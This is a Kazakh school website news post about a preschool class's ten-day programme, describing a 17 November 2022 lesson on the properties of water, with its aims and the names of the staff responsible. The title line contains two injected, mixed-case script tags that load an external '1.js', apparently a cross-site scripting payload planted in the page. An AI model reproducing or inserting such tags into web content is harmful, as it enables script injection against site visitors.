Мектепалды даярлық сыныптарының онкүндігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.11.2022 Мектепалды даярлық сыныптарының онкүндігін өткізу жоспарына сәйкес 17 қарашада қоршаған орта мен таныстыру сабағы өткізілді, балалар ғылыми-зерттеу жұмыстарына тартылды. Тақырыбы: «Судың қасиеттері» Жобаның ұзақтығы: қысқа мерзімді. Сабақтың мақсаты: балалардың судың қасиеттері туралы түсініктерін кеңейту. Мақсатқа сәйкес келесі міндеттер айқындалды: 1. Судың қасиеттерін білу; 2. Ересек адамның көмегімен сумен қарапайым тәжірибелер жүргізу дағдыларын бекіту; 3. Ойлау, зейін, есте сақтау, талдау, бақылау қабілеттерін дамыту; 4. Суға деген қамқорлықпен қарауға тәрбиелеу, су қорларына қатысты күнделікті экологиялық мінез-құлық дағдыларын қалыптастыру. Жауапты: тәрбиеші -Сейтбекова А.М.,әдіскер Шмельцер Ю.А.
Просмотров: 470


Пікір қосу



Деректерді қолтаңбаға қосу
Текст